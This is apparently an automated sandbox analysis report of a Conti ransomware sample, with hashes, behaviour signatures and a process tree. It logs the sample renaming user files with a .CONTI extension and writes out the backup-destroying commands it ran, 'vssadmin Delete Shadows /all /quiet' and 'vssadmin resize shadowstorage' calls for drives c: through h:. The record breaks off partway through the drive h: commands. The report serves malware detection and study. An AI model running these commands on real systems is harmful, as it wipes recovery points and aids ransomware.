Analysis
-
max time kernel
150s -
max time network
110s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
26-08-2020 20:01
Static task
static1
Behavioral task
behavioral1
Sample
1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
Resource
win7
Behavioral task
behavioral2
Sample
1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
Resource
win10v200722
General
-
Target
1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
-
Size
101KB
-
MD5
42e106fd843b0e3585057c30424f695a
-
SHA1
7b7f0c029a3dcb34a7a448f05b43c5657dd0c471
-
SHA256
1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24
-
SHA512
70acd1c36f44bfa4bb6c4dbf40275e2d508e5a610117de2835435a95950549b33c89b012ea3772c85d6189ee06b575bbe193cbe0aa8fb1a8ad9f4a20192e0ae8
Malware Config
Signatures
-
Conti Ransomware
Ransomware generally thought to be a successor to Ryuk.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies extensions of user files 12 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exedescription ioc process File renamed C:\Users\Admin\Pictures\SelectEnable.png => C:\Users\Admin\Pictures\SelectEnable.png.CONTI 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe File renamed C:\Users\Admin\Pictures\AddUse.tiff => C:\Users\Admin\Pictures\AddUse.tiff.CONTI 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe File opened for modification C:\Users\Admin\Pictures\CompleteInvoke.tiff 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe File renamed C:\Users\Admin\Pictures\CompleteInvoke.tiff => C:\Users\Admin\Pictures\CompleteInvoke.tiff.CONTI 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe File renamed C:\Users\Admin\Pictures\HideCompare.tif => C:\Users\Admin\Pictures\HideCompare.tif.CONTI 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe File renamed C:\Users\Admin\Pictures\OpenRestart.tif => C:\Users\Admin\Pictures\OpenRestart.tif.CONTI 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe File renamed C:\Users\Admin\Pictures\RenameTrace.raw => C:\Users\Admin\Pictures\RenameTrace.raw.CONTI 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe File renamed C:\Users\Admin\Pictures\SplitMount.raw => C:\Users\Admin\Pictures\SplitMount.raw.CONTI 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe File opened for modification C:\Users\Admin\Pictures\AddUse.tiff 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe File renamed C:\Users\Admin\Pictures\FormatUnlock.tif => C:\Users\Admin\Pictures\FormatUnlock.tif.CONTI 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe File renamed C:\Users\Admin\Pictures\StepWrite.tif => C:\Users\Admin\Pictures\StepWrite.tif.CONTI 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe File renamed C:\Users\Admin\Pictures\SendUnblock.raw => C:\Users\Admin\Pictures\SendUnblock.raw.CONTI 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe -
Drops desktop.ini file(s) 24 IoCs
Processes:
1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exedescription ioc process File opened for modification C:\Users\Admin\Links\desktop.ini 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe File opened for modification C:\Users\Admin\Searches\desktop.ini 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe File opened for modification C:\Users\Public\Videos\desktop.ini 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe File opened for modification C:\Users\Admin\Music\desktop.ini 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe File opened for modification C:\Users\Admin\Videos\desktop.ini 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe File opened for modification C:\Users\Public\desktop.ini 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe File opened for modification C:\Users\Public\Libraries\desktop.ini 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe File opened for modification C:\Users\Public\Downloads\desktop.ini 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe File opened for modification C:\Users\Public\Desktop\desktop.ini 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe File opened for modification C:\Users\Public\Documents\desktop.ini 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe File opened for modification C:\Users\Public\Music\desktop.ini 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe File opened for modification C:\Users\Public\Pictures\desktop.ini 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe File opened for modification C:\Users\Admin\Documents\desktop.ini 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe -
Enumerates connected drives 3 TTPs 18 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exedescription ioc process File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\f: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\f: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe -
Drops file in Windows directory 1 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\Debug\ESE.TXT svchost.exe -
Interacts with shadow copies 2 TTPs 14 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exepid process 2336 vssadmin.exe 3568 vssadmin.exe 2544 vssadmin.exe 3068 vssadmin.exe 2152 vssadmin.exe 3264 vssadmin.exe 3900 vssadmin.exe 3936 vssadmin.exe 360 vssadmin.exe 1624 vssadmin.exe 408 vssadmin.exe 3804 vssadmin.exe 3676 vssadmin.exe 1300 vssadmin.exe -
Modifies data under HKEY_USERS 1 IoCs
Processes:
svchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache svchost.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exepid process 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
vssvc.exedescription pid process Token: SeBackupPrivilege 496 vssvc.exe Token: SeRestorePrivilege 496 vssvc.exe Token: SeAuditPrivilege 496 vssvc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 3956 wrote to memory of 3304 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe cmd.exe PID 3956 wrote to memory of 3304 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe cmd.exe PID 3956 wrote to memory of 3304 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe cmd.exe PID 3304 wrote to memory of 3676 3304 cmd.exe vssadmin.exe PID 3304 wrote to memory of 3676 3304 cmd.exe vssadmin.exe PID 3304 wrote to memory of 3676 3304 cmd.exe vssadmin.exe PID 3956 wrote to memory of 904 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe cmd.exe PID 3956 wrote to memory of 904 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe cmd.exe PID 3956 wrote to memory of 904 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe cmd.exe PID 904 wrote to memory of 360 904 cmd.exe vssadmin.exe PID 904 wrote to memory of 360 904 cmd.exe vssadmin.exe PID 904 wrote to memory of 360 904 cmd.exe vssadmin.exe PID 3956 wrote to memory of 1160 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe cmd.exe PID 3956 wrote to memory of 1160 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe cmd.exe PID 3956 wrote to memory of 1160 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe cmd.exe PID 1160 wrote to memory of 1300 1160 cmd.exe vssadmin.exe PID 1160 wrote to memory of 1300 1160 cmd.exe vssadmin.exe PID 1160 wrote to memory of 1300 1160 cmd.exe vssadmin.exe PID 3956 wrote to memory of 1524 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe cmd.exe PID 3956 wrote to memory of 1524 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe cmd.exe PID 3956 wrote to memory of 1524 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe cmd.exe PID 1524 wrote to memory of 1624 1524 cmd.exe vssadmin.exe PID 1524 wrote to memory of 1624 1524 cmd.exe vssadmin.exe PID 1524 wrote to memory of 1624 1524 cmd.exe vssadmin.exe PID 3956 wrote to memory of 1920 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe cmd.exe PID 3956 wrote to memory of 1920 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe cmd.exe PID 3956 wrote to memory of 1920 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe cmd.exe PID 1920 wrote to memory of 2152 1920 cmd.exe vssadmin.exe PID 1920 wrote to memory of 2152 1920 cmd.exe vssadmin.exe PID 1920 wrote to memory of 2152 1920 cmd.exe vssadmin.exe PID 3956 wrote to memory of 2396 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe cmd.exe PID 3956 wrote to memory of 2396 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe cmd.exe PID 3956 wrote to memory of 2396 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe cmd.exe PID 2396 wrote to memory of 2544 2396 cmd.exe vssadmin.exe PID 2396 wrote to memory of 2544 2396 cmd.exe vssadmin.exe PID 2396 wrote to memory of 2544 2396 cmd.exe vssadmin.exe PID 3956 wrote to memory of 2828 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe cmd.exe PID 3956 wrote to memory of 2828 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe cmd.exe PID 3956 wrote to memory of 2828 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe cmd.exe PID 2828 wrote to memory of 3900 2828 cmd.exe vssadmin.exe PID 2828 wrote to memory of 3900 2828 cmd.exe vssadmin.exe PID 2828 wrote to memory of 3900 2828 cmd.exe vssadmin.exe PID 3956 wrote to memory of 3904 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe cmd.exe PID 3956 wrote to memory of 3904 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe cmd.exe PID 3956 wrote to memory of 3904 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe cmd.exe PID 3904 wrote to memory of 3936 3904 cmd.exe vssadmin.exe PID 3904 wrote to memory of 3936 3904 cmd.exe vssadmin.exe PID 3904 wrote to memory of 3936 3904 cmd.exe vssadmin.exe PID 3956 wrote to memory of 2944 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe cmd.exe PID 3956 wrote to memory of 2944 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe cmd.exe PID 3956 wrote to memory of 2944 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe cmd.exe PID 2944 wrote to memory of 3264 2944 cmd.exe vssadmin.exe PID 2944 wrote to memory of 3264 2944 cmd.exe vssadmin.exe PID 2944 wrote to memory of 3264 2944 cmd.exe vssadmin.exe PID 3956 wrote to memory of 4020 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe cmd.exe PID 3956 wrote to memory of 4020 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe cmd.exe PID 3956 wrote to memory of 4020 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe cmd.exe PID 4020 wrote to memory of 408 4020 cmd.exe vssadmin.exe PID 4020 wrote to memory of 408 4020 cmd.exe vssadmin.exe PID 4020 wrote to memory of 408 4020 cmd.exe vssadmin.exe PID 3956 wrote to memory of 3056 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe cmd.exe PID 3956 wrote to memory of 3056 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe cmd.exe PID 3956 wrote to memory of 3056 3956 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe cmd.exe PID 3056 wrote to memory of 3068 3056 cmd.exe vssadmin.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe"C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe"1⤵
- Modifies extensions of user files
- Drops desktop.ini file(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3956 -
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin Delete Shadows /all /quiet2⤵
- Suspicious use of WriteProcessMemory
PID:3304 -
C:\Windows\SysWOW64\vssadmin.exevssadmin Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3676
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
PID:904 -
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB3⤵
- Interacts with shadow copies
PID:360
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:1160 -
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:1300
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
PID:1524 -
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1624
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2152
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
PID:2396 -
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2544
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3900
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
PID:3904 -
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3936
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3264
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
PID:4020 -
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:408
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3068
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵PID:3848
-
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB3⤵
- Enumerates connected drives
